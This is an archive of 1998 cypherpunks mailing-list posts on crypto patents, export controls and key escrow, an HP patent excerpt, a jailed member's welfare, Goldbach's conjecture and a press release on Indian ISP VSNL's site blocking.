on-line, and the Golomb article doesn't seems available elsewhere.  Might
be worth digging that up. I'd love to read more of what Shannon Award
winner Sol Golomb had to say about the relationship between Jevon's 19th
Century mathematical research and public key cryptography.

	I think it is appropriate to note, however, that Prof. Golomb did
_not_ conclude that the functionality of the RSA public key cryptosystem
was "obvious" to anyone familiar with Jevons' work.

	Suerte,
		_Vin


-----
"Cryptography is like literacy in the Dark Ages. Infinitely potent, for
good and ill... yet basically an intellectual construct, an idea, which by
its nature will resist efforts to restrict it to bureaucrats and others who
deem only themselves worthy of such Privilege."
_ A Thinking Man's Creed for Crypto  _vbm.

 *     Vin McLellan + The Privacy Guild + <vin@shore.net>    *
      53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas L. Peterson" <fnorky@chisp.net>
Date: Thu, 19 Nov 1998 05:01:57 +0800
To: Declan McCullagh <cypherpunks@Algebra.COM>
Subject: Re: FC: More on Network Associates and its crypto-politics
In-Reply-To: <v04020a04b277c6d69429@[139.167.130.246]>
Message-ID: <36532901.A0A9255B@chisp.net>
MIME-Version: 1.0
Content-Type: text/plain



Declan McCullagh wrote:
> 
> William -- your speculation may be true, but for now we can settle for
> fact: they do support export controls. It makes sense, too: export ctrls
> create an artificial market for key recovery crypto, which TIS will be
> happy to sell to you.

Wouldn't this only work if import controls were put in place?  Right now
there is very little to keep me from buying non-GAK software from
someone
other than TIS.

-Doug
www.TheServerFarm.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas L. Peterson" <fnorky@chisp.net>
Date: Thu, 19 Nov 1998 05:02:40 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: FC: More on Network Associates and its crypto-politics
In-Reply-To: <v04020a04b277c6d69429@[139.167.130.246]>
Message-ID: <36532C1C.C79813E3@chisp.net>
MIME-Version: 1.0
Content-Type: text/plain



Declan McCullagh wrote:
> 
> You're not a US corporation that hopes to use the same software
> domestically and abroad, for instance.

Good point.  I was thinking from the point of view of an individual or
small business.
I'm glad I don't have any government contracts.

> At 01:07 PM 11-18-98 -0700, Douglas L. Peterson wrote:
> >Declan McCullagh wrote:
> >>
> >> William -- your speculation may be true, but for now we can settle for
> >> fact: they do support export controls. It makes sense, too: export ctrls
> >> create an artificial market for key recovery crypto, which TIS will be
> >> happy to sell to you.
> >
> >Wouldn't this only work if import controls were put in place?  Right now
> >there is very little to keep me from buying non-GAK software from
> >someone
> >other than TIS.
> >
> >-Doug
> >www.TheServerFarm.net
> >

-Doug
www.TheServerFarm.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 19 Nov 1998 03:19:01 +0800
To: cypherpunks@cyberpass.net
Subject: National Security KRA Framework
Message-ID: <199811181839.NAA01188@smtp2.atl.mindspring.net>
MIME-Version: 1.0
Content-Type: text/plain



These are excerpts from US Patent 5835596: "International
cryptography framework" issued on November 10, 1998, to
inventors Keith S. Klemba, Santa Clara, CA, and Roger
Merckling, Gieres, France and assigned to Hewlett Packard. 

Source: 

http://www.patents.ibm.com/patlist?icnt=US&patent_number=05835596&x=19&y=4

It's an update of US Patent 5651068 issued for the same
methodology in July, 1997. Summaries of the patents are
also available at < http://www.uspto.gov >.

INTERNATIONAL CRYPTOGRAPHY FRAMEWORK

SUMMARY OF THE INVENTION

The invention provides a four-part technology framework
that supports international cryptography, which includes a
national flag card, a cryptographic unit, a host system, and a
network security server. Three of the four service elements
have a fundamentally hierarchical relationship. The National
Flag Card (NFC) is installed in the Cryptographic Unit (CU)
which, in turn, is installed into a Host System (HS).
Cryptographic instructions on the Host system cannot be
executed without a Cryptographic Unit, which itself requires
the present of a valid National Flag Card before its services
are available. The fourth service element, a Network
Security Server (NSS), can provide a range of different
security services including verification of the other three
service elements.

The framework supports the design, implementation, and
operational elements of any and all national policies, while
unifying the design, development, and operation of
independent national security policies. The invention thus
gives standard form to the service elements of national
security policies, where such service elements include such
things as hardware from factors, communication protocols,
and on-line and off-line data definitions. [Snip drawing and
detailed descriptions.]

APPLICATION OF THE FRAMEWORK

The invention has various applications. In particular, the
framework is ideally suited for various national security
schemes and operates consistently across a variety of local
laws. For example the framework could be used to support a
key escrow policy. Key escrowing is a process where the
keys or family keys used for cryptography are kept by a third
party, in the national context, typically a government agency.
This allows the third party to decrypt information when, for
example, a law enforcement agency is required to see the
contents of an encrypted message.

For example if the policy of nation-X requires key escrow,
then when nation-X NFC's are put into circulation they
contain a key escrowed by nation-X. Law enforcement
would be able to use the electronic stamp on a message to
determine that the message was encrypted under the policy
of nation-X. It would also be able to determine unique
identification information of the specific NFC used to enable
the CU. If nation-X agrees to cooperate, the escrowed key
for the NFC involved may be obtained to decrypt the
suspicious message.

The actual encryption algorithm used in nation-X may be the
same encryption algorithm that is used in nation-Z, such that
when a user from nation-X visits nation-Z it is only
necessary to put a NFC from nation-Z into the CU. The
encryption algorithm in the CU remains the same, but what
is governing the use of cryptography is the policy of nation-
Z. For example, the policy of nation-Z may require a trap
door, such that the government of nation-Z is able to take a
back door into the users system to read the deciphered text.
In this case the nation-Z NFC provides a back door rather
than an escrowed key to law enforcement. Several such
schemes are known in the art and it is a feature of the
invention that the framework is readily adapted to
accommodate such schemes as may be implemented in a
particular national policy without affecting the basic
hardware, or data structures of a user system, with the
exception of the NFC.

Thus, the encryption algorithms in CU may be the same
encryption algorithms used everywhere. The NFCs control
the use of these encryption algorithms in accordance with

the local law. Because the NSS is a trusted third party that
validates proper local use of the framework, it is not
possible to use cryptography unless a locally accepted NFC
is installed in the CU. In the example above, even though the
encryption engine operates properly in nation-X, it would
not operate in nation-Z unless the NFC was replaced with a 
nation-Z's NFC. For international communication of
encrypted information, (e.g. where an encrypted message is
generated in nation-Z and sent to nation-X) the involvement
of cryptography for such messages will be independently
controlled by two NFCs -- the X flag card in nation-X and
the Z-flag card in nation-Z. The invention therefore offers
the ability to support government policy, whatever that
policy may be, and still provide uniform cryptographic
services.

In addition to the nationalization issues that are illustrated
above, within a certain nation there may be multiple
encryption policies (e.g. nation-X might have a policy for
banking that is more liberal than its policy for
manufacturing). Accordingly, the framework is adapted to
operate within each country under several different national
policies, or with several different levels of encryption. For
example, just as there are different stamps for first class and
priority mail, the framework may allow for different levels
of encryption based on the type of NFC installed.

It is a feature of the framework that CUs may have the major
standard encryption algorithms built-in (e.g. DES, RSA,
DSS, MD5). However, it is also possible to install custom
algorithms into the CU providing that the policy in the
governing NFC permits this type of activity. Software
algorithms can be transferred completely or partially into the
CU from either the NFC or the NSS. Hardware algorithms
can be added to the CU via the NFC. The actual encryption
of a message may involve the NFC, CU, or NSS, or any
combination thereof. As soon as the NFC is removed from
the CU these custom algorithms are no longer operative,
perhaps not even present, in the CU.

[End excerpts]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 19 Nov 1998 03:27:04 +0800
To: Gordon Jeff  INSP <Jeff.Gordon@inspection.irs.gov>
Subject: CJ's Teeth/Glasses
In-Reply-To: <9F00F15E736BD11196B700A0C98448FE0A97BD@WR-SEA-SERVER-2>
Message-ID: <199811181850.NAA03064@smtp2.atl.mindspring.net>
MIME-Version: 1.0
Content-Type: text/plain



Jeff,

Alia Johnson reports that CJ has not had his teeth and
glasses returned. Can you tell me, or refer me to someone
who can, what is needed to get that done. Or if I have no 
right to get involved who else should make the request. 
Got a Fedex account ready for use.

Thanks much,

John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vin McLellan <vin@shore.net>
Date: Thu, 19 Nov 1998 04:12:07 +0800
To: "Brown, R Ken" <brownrk1@texaco.com>
Subject: RE: Rivest Patent
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F859D@MSX11002>
Message-ID: <v04003a09b278d1158ded@[198.115.179.81]>
MIME-Version: 1.0
Content-Type: text/plain



I conceed your point.  Nicely reasoned. Thank you.

	_Vin


At 12:12 PM -0500 11/18/98, Brown, R Ken wrote:

>The real point is surely  that a patent for a device invented by someone
>with  a basic knowledge of physics is used to protect the *invention*
>not the *knowledge*. They are not used to prevent anyone else inventing
>another device using the same basic knowledge of physics.
>
>Even if it is perfectly just for the RSA (or any other) patent "taken as
>a whole" to be used to protect  "not merely a disembodied mathematical
>concept but rather a specific machine";  that *doesn''t* mean it is
>neccessarily just to use the patent to protect that "disembodied
>mathematical concept" when it is used in some other "specific machine".
>But software patents *are* used to try to stop people employing the same
>algorithms in other inventions. So, despite  the ingenuous  ruling of
>the court they *are* being used to try to control "disembodied
>mathematical concepts" - in other words ideas.
>
>I have no idea if Watt had a patent on the steam governor. But I bet he
>didn't try to take one out on Boyle's Law.
>
>
>Ken Brown


-----
      Vin McLellan + The Privacy Guild + <vin@shore.net>
  53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548
                         -- <@><@> --





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 18 Nov 1998 16:05:29 +0800
To: coderpunks@toad.com
Subject: statgraphics....
Message-ID: <Pine.GSO.3.96.981118150715.29921A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



Could someone give me a copy of statgraphics for dos or windows?
I would gladly appreciate it.

Thank you very much.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"If a student is particular about his studies, especially while he is too
young to know which are useful and which are not, we shall say he is no
lover of learning or of wisdom; just as, if he were dainty about his food,
we should say he was not hungry or fond of eating, but had a poor 
appetite. " ---- PLATO

By the way, it's Bernie not Bernardo.
metaphone@altavista.net
``````````````````````````````````````````````````````````````````````````````




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 19 Nov 1998 05:07:29 +0800
To: "Douglas L. Peterson" <cypherpunks@Algebra.COM>
Subject: Re: FC: More on Network Associates and its crypto-politics
In-Reply-To: <v04020a04b277c6d69429@[139.167.130.246]>
Message-ID: <199811182025.MAA21320@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



You're not a US corporation that hopes to use the same software
domestically and abroad, for instance. 


At 01:07 PM 11-18-98 -0700, Douglas L. Peterson wrote:
>Declan McCullagh wrote:
>> 
>> William -- your speculation may be true, but for now we can settle for
>> fact: they do support export controls. It makes sense, too: export ctrls
>> create an artificial market for key recovery crypto, which TIS will be
>> happy to sell to you.
>
>Wouldn't this only work if import controls were put in place?  Right now
>there is very little to keep me from buying non-GAK software from
>someone
>other than TIS.
>
>-Doug
>www.TheServerFarm.net
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 19 Nov 1998 05:57:57 +0800
To: Anonymous <cypherpunks@cyberpass.net
Subject: Re: FC: More on Network Associates and its crypto-politics
In-Reply-To: <199811181903.UAA22584@replay.com>
Message-ID: <199811182114.NAA06149@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



If anonymous has any evidence that TIS' policy has changed from earlier
this year, I'd like to hear it.

I guess if anonymous wants to call me an "extremist," I'll take it as a
compliment. Personally I think of myself as pragmatic.

-Declan


At 08:03 PM 11-18-98 +0100, Anonymous wrote:
>Declan McCullagh writes:
>
>>TIS supports export controls on encryption products. My article:
>> http://www.well.com/user/declan/pubs/cwd.shadow.cryptocrats.0298.txt
>
>Two problems here.  First, you are using the present tense in saying that
>TIS "supports" export controls, but your article is from nine months ago.
>There have been many changes since then, including loosening of the crypto
>export rules, the acquisition of TIS by Network Associates, and a recent
>statement that TIS has backed off from its leadership role in advocating
>key recovery.  What is TIS's current policy?  It certainly sounds like
>it is changing.  You should find out before claiming to know what it is.
>
>Second, even in the context of last February, what you wrote is:
>
>> Some of the firms selected also endorse restrictions. Trusted Information 
>> Systems recently circulated a policy paper calling for "sensible" 
>> legislation to "make the export of 56-bit current interim DES controls 
>> permanent and permit the export of stronger encryption when it is combined 
>> with a key recovery system." (Which, coincidentally, TIS is happy to sell 
>> you...)
>
>At the time, this would have represented a LIBERALIZATION of export laws.
>56 bit exports were only allowed in the context of a promise to add key
>recovery even for 56 bit keys.  The statement you have quoted calls for
>allowing 56 bit key export permanently, and only requiring key recovery
>for stronger encryption.  True, it was not a call for full elimination
>of restrictions, but it was a step in the right direction.
>
>You are falling into the tiresome pattern of extremists who claim that
>moderates are lackeys for the other side.  It's like an anti-abortion
>fanatic who says that those who oppose murdering abortion doctors are
>baby killers.  Try reporting the facts instead of altering them to fit
>your biased views.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 19 Nov 1998 03:32:15 +0800
To: cypherpunks@cyberpass.net
Subject: Re: FC: More on Network Associates and its crypto-politics
Message-ID: <199811181903.UAA22584@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Declan McCullagh writes:

>TIS supports export controls on encryption products. My article:
> http://www.well.com/user/declan/pubs/cwd.shadow.cryptocrats.0298.txt

Two problems here.  First, you are using the present tense in saying that
TIS "supports" export controls, but your article is from nine months ago.
There have been many changes since then, including loosening of the crypto
export rules, the acquisition of TIS by Network Associates, and a recent
statement that TIS has backed off from its leadership role in advocating
key recovery.  What is TIS's current policy?  It certainly sounds like
it is changing.  You should find out before claiming to know what it is.

Second, even in the context of last February, what you wrote is:

> Some of the firms selected also endorse restrictions. Trusted Information 
> Systems recently circulated a policy paper calling for "sensible" 
> legislation to "make the export of 56-bit current interim DES controls 
> permanent and permit the export of stronger encryption when it is combined 
> with a key recovery system." (Which, coincidentally, TIS is happy to sell 
> you...)

At the time, this would have represented a LIBERALIZATION of export laws.
56 bit exports were only allowed in the context of a promise to add key
recovery even for 56 bit keys.  The statement you have quoted calls for
allowing 56 bit key export permanently, and only requiring key recovery
for stronger encryption.  True, it was not a call for full elimination
of restrictions, but it was a step in the right direction.

You are falling into the tiresome pattern of extremists who claim that
moderates are lackeys for the other side.  It's like an anti-abortion
fanatic who says that those who oppose murdering abortion doctors are
baby killers.  Try reporting the facts instead of altering them to fit
your biased views.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 19 Nov 1998 12:58:08 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: What's up with algebra.com?
Message-ID: <199811190440.WAA00215@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Anyone heard what the status of algebra.com is?

I've removed them from the SSZ distribution list temporarily, when they come
back I'll re-add the site.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Thu, 19 Nov 1998 13:16:40 +0800
To: ravage@einstein.ssz.com (Jim Choate)
Subject: Re: What's up with algebra.com?
In-Reply-To: <199811190440.WAA00215@einstein.ssz.com>
Message-ID: <199811190500.XAA00326@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Its back on.

I am REALLY tired of antispammers. They are responsible for a lot more
problems than spammers themselves. It is all the fault of the bullshit
antispam software running on sites that feed me mail.

igor


Jim Choate wrote:
> 
> 
> Hi,
> 
> Anyone heard what the status of algebra.com is?
> 
> I've removed them from the SSZ distribution list temporarily, when they come
> back I'll re-add the site.
> 
> 
>     ____________________________________________________________________
>  
>             Lawyers ask the wrong questions when they don't want
>             the right answers.
> 
>                                         Scully (X-Files)
> 
>        The Armadillo Group       ,::////;::-.          James Choate
>        Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>        www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                            -====~~mm-'`-```-mm --'-
>     --------------------------------------------------------------------
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 19 Nov 1998 13:30:17 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Test (algebra.com is back)
Message-ID: <199811190514.XAA00928@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Test (algebra.com) is back...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 19 Nov 1998 13:35:30 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Goldbach's Conjecture - a question about prime sums of odd numbers...
Message-ID: <199811190522.XAA01164@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I have a question related to Goldbach's Conjecture:

All even numbers greater than two can be represented as the sum of primes.

Is there any work on whether odd numbers can always be represented as the
sum of primes? This of course implies that the number of prime members
must be odd and must exclude 1 (unless you can have more than a single
instance of a given prime). Has this been examined?

I'm assuming, since I can't find it explicitly stated anywhere, that
Goldbachs Conjecture allows those prime factors to occur in multiple
instances.

I've pawed through my number theory books and can't find anything relating
to this as regards odd numbers.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas L. Peterson" <fnorky@chisp.net>
Date: Thu, 19 Nov 1998 14:57:02 +0800
To: "cypherpunks@Algebra.COM>
Subject: Re: CJ Update Corrected
Message-ID: <3653B9AF.59B78D59@chisp.net>
MIME-Version: 1.0
Content-Type: text/plain



John Young wrote:
> 
> This is attorney protected information.
> 
> Received today by e-mail:
> 
> November 16, 1998
> Springfield, Missouri
> 
> To:  friends of Carl Johnson, The Last Canadian
> Outlaw (name of his last album)
> 
> From:   Alia Johnson
> 
> I saw CJ today at the Springfield facility for the
> criminally disturbing. We spent five hours, a lot of
> laughing, a little crying, and talking, with lots of
> cameras and mikes on us. The controllers would not
> let me take notes!
[large snip]

 
> CJ has been without glasses and without his teeth for
> the whole time since he was arrested. JEFF GORDON
> STILL HAS CJ'S TEETH. However, his vision has
> improved! He is also without proper medication for
> his Tourette's. The shrink told him that the
> amphetamines he had been prescribed and which were
> working well would probably be stolen by the staff
> anyway. CJ is very conscious of managing his
> neurological condition, with coffee, sugar, fasting,
> and self-control. He does complain that he was so
> pleased with himself that he got through his last
> rage attack without hurting himself or acting it out
> that he punched a wall in celebration and hurt his
> hand!

Someone should talk to Larry Dowling (the lawyer looking
out for CJ's rights) about this.  This seems to be a
violation of the ADA (Americans with Disabilities Act).


-Doug
www.TheServerFarm.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 19 Nov 1998 13:53:37 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: A tad more on Goldbach's Conjecture....
Message-ID: <199811190543.XAA01436@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I figure I'll share the thought I'm trailing....

Given Goldbach's Conjecture as true then it has a geometric interpretation.

Given a triangle of even area greater than two it can be tiled with a set of
triangles, with areas given by primes, exactly. I'm using equilaterals as a
test case since they're easy to deal with geometricaly.

So, if one can show that this is true then Goldbach's follows.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blake Buzzini" <bab282@psu.edu>
Date: Thu, 19 Nov 1998 13:29:33 +0800
To: "Cypherpunks List" <cypherpunks@einstein.ssz.com>
Subject: Crypto Coops/Internships (Other Than NSA)??
Message-ID: <001001be137a$32401170$88e3ba92@ruby-river>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know of any cryptology-related coop/internship programs other
than the one offered by the NSA?

Blake Buzzini, PSU




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 19 Nov 1998 14:35:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers...
In-Reply-To: <199811190522.XAA01164@einstein.ssz.com>
Message-ID: <199811190620.AAA02077@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:

> Hi,

> I have a question related to Goldbach's Conjecture:

> All even numbers greater than two can be represented as the sum of primes.

All even numbers greater than two can be represented as the sum of 
TWO primes. 

> Is there any work on whether odd numbers can always be represented as the
> sum of primes? 

Goldbach originally suggested that all numbers greater than two could be
expressed as the sum of three primes, if one tossed in 1 as a prime
number.  Euler pointed out that this was equivalent to even numbers
greater than two being expressed as the sum of two primes. 

This seemed a somewhat cleaner formulation, and it was adopted.

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blake Buzzini" <bab282@psu.edu>
Date: Thu, 19 Nov 1998 13:33:07 +0800
To: "CypherPunks" <cypherpunks@Algebra.COM>
Subject: Crypto Coops/Internships (Other Than NSA)??
Message-ID: <001101be137c$48e4f6f0$88e3ba92@ruby-river>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know of any cryptology-related coop/internship programs other
than the one offered by the NSA?

Blake Buzzini, PSU




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <mail@vipul.net>
Date: Thu, 19 Nov 1998 05:45:32 +0800
To: Cypherpunks <cypherpunks@cyberpass.net>
Subject: VSNL Censors Indian Internet Sites.
Message-ID: <19981119021626.A682@fountainhead.vipul.net>
MIME-Version: 1.0
Content-Type: text/plain



   17 November, 1998
   FOR IMMEDIATE RELEASE
   Contact: Vipul Ved Prakash, 2233328.
   

   VSNL Censors Indian Internet Sites


   NEW DELHI, INDIA - VSNL, the Indian Internet monopoly, has been
   illegally blocking Internet access to a number of Indian web sites for
   the last several weeks, a Delhi-based Internet presence provider
   revealed today. The block affects only Indian citizens in India -
   users anywhere else in the world are not affected.
   
   One of the sites targeted is Sense/NET, (www.sensenet.net). Sense/NET
   lets users of VSNL's text-based shell account use the graphical
   Netscape browser over their shell accounts, while using only the
   normal shell account facilities that VSNL provides. With Sense/NET,
   the common man can surf the Internet just like with VSNL's premium
   TCP/IP service, but at a fraction of the cost.
   
   General Logic, the startup company behind the Sense/NET service, is
   not taking the blocking of its server lightly. "We did not so much as
   receive any communication from VSNL about this step, which has the
   potential to seriously affect our business," said Dr. Pawan Jaitly, a
   director of the company. "It seems very strange, too, that a security
   breach was attempted on our server over the Internet just days before
   the blockage."
   
   The censored server, at the (currently blocked) IP address of
   208.222.215.97, hosts a number of other web sites including the
   largest Yellow Pages of Indian exporters and importers available on
   the Internet and the corporate web sites of the Apple Publishing
   Technology Center, NewGen Software, and Educational Consultants India
   Limited.
   
   The award-winning web site of Connect magazine, the first Indian print
   publication to launch a web edition, is also located on the General
   Logic server.
   
   Sense/NET users and others affected by the block who called up VSNL's
   help desk to request clarification on this issue and access to the
   sites were told by VSNL staffers that they did not know what the
   problem was, and that they themselves could not access the sites in
   question. No official intimation or even acknowledgement about the
   block has been forthcoming from VSNL.
   
   This is not the first time VSNL has blocked access to selected sites
   on the Internet. On September 19, 1998, online activist Dr. Arun
   Mehta's writ petition was admitted for hearing in the court of Justice
   Anil Dev Singh, Delhi High Court, against VSNL, challenging its
   blockage of certain Internet sites. The sites listed in the petition
   provide information and software for voice transmissions over the
   Internet.
   
   The petition argues that this action "is wholly without basis in law
   and amounts to arbitrary and illegal censorship of the petitioner's
   Fundamental Right to freedom of speech, expression and information as
   well as an illegal denial of his right to freedom to practice his
   chosen profession."
   
   The petition seeks affirmation that the constitutional rights to free
   speech apply equally in cyberspace, and it also opens up the issue of
   VSNL's ban on Internet telephony to judicial scrutiny. The matter will
   come up for hearing on December 9, 1998. The case is being argued by
   Mr. Ashok Aggarwal.
   
   The Exporters and Importers Yellow Pages web site hosted on General
   Logic's recently blocked server is a vital e-commerce resource for
   over sixty-five thousand traders who earn India valuable foreign
   exchange. "This ban will hurt Indian exporters as well. By banning
   access to sites... VSNL is cynically choosing to let the nation suffer
   severe loss if in the process it can safeguard its own monopolistic
   profits," said Dr. Mehta.
   
   "Ironically, VSNL also blocked Educational Consultants, a public
   sector government organization, with its action."
   
   General Logic was able to move all the web sites that were the victims
   of VSNL's action to a non-blocked area within hours. "Most of our
   clients didn't even notice their sites and email messages were being
   blocked by VSNL," said Dr. Jaitly. The Sense/NET site remains blocked,
   however.
   
   "What VSNL is doing is completely illegal. A website is a means of
   expression and is covered by the right to expression of all indian
   citizens under article 19(1)a of the Indian Constitution. This can
   only be restricted under article 19(2) on 'reasonable grounds' which
   include obscenity, but certainly not the provision of competitive
   services at reasonable cost," commented Rishab Aiyer Ghosh, managing
   editor of First Monday, a European journal on Internet law.
   
   Last year a duo of computer whiz-kids in Cochin released Shellsock, a
   software package that made it possible for users of VSNL shell
   accounts to browse the 'Net graphically. VSNL quickly set about
   working on ways to break Shellsock, and eventually succeeded in
   restricting the environment on its shell accounts to the extent that
   Shellsock was unable to function.
   
   General Logic launched its Sense/NET service soon after, with the goal
   of providing TCP/IP Internet 'tunneling' service to users worldwide,
   not just in India. "There are other countries suffering under the yoke
   of state censorship of the Internet, like China, whose authoritatian
   government, without warning, blocked access to the BBC web site for
   its citizens," said Dr. Mehta. "VSNL is a monopoly that is crippling
   India's progress on the Internet front."
   
   Even Microsoft, he observed, which holds an effective monopoly in the
   operating system market worldwide, has no mandate by any government in
   the market - it has to keep forging ahead or lose to its competitors.
   "VSNL does not have that motivation, and so it is that the Indian
   consumer and India suffer."
   
   Besides the threat of censorship and poor service, another risk with
   state monopoly Internet access providers is that they can read your
   mail, and monitor your communications, as the data flows through their
   systems. Jaitly disclosed that his company is working on providing
   strong military grade encryption as part of its Internet tunneling
   services, to provide secure private networks across untrusted links
   for business and personal use.
   
   "We envision Sense/NET as a sort of 'Meta ISP' providing secure,
   uncensorable Internet tunneling service to people in places where
   local access providers are unable or unwilling to deliver full
   access," said Vipul Ved Prakash, Director of research at General
   Logic. "We believe in every individual's fundamental right to access
   human knowledge without restriction. Our message to these people is:
   'There's light at the end of the tunnel.'"
   
   It's not all crypto-anarchy and dreams of digital revolution, however.
   Sense/NET is a valuable service for ordinary users who are attempting
   to make the most effective use of their VSNL shell accounts with the
   limited services provided. Many of the subscribers to the service are
   students and other low income groups, who simply cannot afford VSNL's
   higher priced services.
   
   A case in point is that of Pranav Lal, a New Delhi student. Pranav is
   blind, and VSNL's shell account is next to useless for him. Sense/NET
   on the other hand allows him to use voice-enabled software to surf the
   'net.
   
   "I can't afford the VSNL TCP/IP account, but for me it is vital that I
   am in touch with my peers over the world over the Internet," says
   Pranav. "Sense/NET is great because it lets me handle my email and
   navigate the web really simply."
   
   "We see the global free flow of ideas across national borders, enabled
   by digital data communications and encryption technology, as the most
   liberating development of the 20th century," said Ashish Gulhati head
   of development at General Logic. "Regulation is futile," he added. The
   company expects its services will be most in demand in countries where
   authoritarian regimes are in power.
   
   "It's shocking that this kind of thing continues to go on in India,"
   observed Dr. Mehta. "We're the world's largest democracy, on the brink
   of entering the 21st century as a major player in the global software
   industry. But we're still enslaved by laws created during the British
   Raj, even in high priority areas like telecom."
   
   [1324 Words]

     _________________________________________________________________
   
   Notes:
   
    1. Dr. Arun Mehta's petition is at
       <http://members.tripod.com/~india_gii/telepet.html>.

    2. The Forum for Rights to Electronic Expression articles are at
       <http://www.eff.org/pub/Groups/FREE>

    3. Censored sites:
          + http://www.sensenet.net/ (Currently blocked)
          + http://www.trade-india.com/ (Now accessible on a new server)
          + http://www.aptc-india.com/ (Now accessible on a new server)
          + http://www.edcil.org/ (Now accessible on a new server)
          + http://www.newgensoft.com/ (Now accessible on a new server)
          + http://www.newgen.net/ (Now accessible on a new server)
          + http://www.connectmagazine.com/ (Now accessible on a new server)
          + http://www.net2phone.com/ (Currently blocked)
          + http://www.vocaltec.com/ (Currently blocked)
          + http://www.netspeak.com/ (Currently blocked)

    4. Email addresses:
          + Dr. Arun Mehta - amehta@cerf.net
          + Ashish Gulhati - ashish@generalogic.com
          + Ashok Agarwal - ashokagr@del2.vsnl.net.in
          + Dr. Pawan Jaitly - pawan@generalogic.com
          + Rishab Aiyer Ghosh - ghosh@firstmonday.dk
          + Vipul Ved Prakash - vipul@generalogic.com

     _________________________________________________________________
   
   Rev: SNPR v0.06 1998/11/17 15:58:14 webmaster@generalogic.com



-- 

VIPUL VED PRAKASH              Cryptography.             "Everything is what 
mail@vipul.net             |   Distributed Systems. |    it is because it got
http://vipul.net/          |   Network Agents.      |    that way." 
91 11 2233328              |   Perl Hacking.        |  
198 Madhuban IP Extension  |   Linux.               |        d'arcy thompson.
Delhi, INDIA 110 092      /    Networked Media.    /




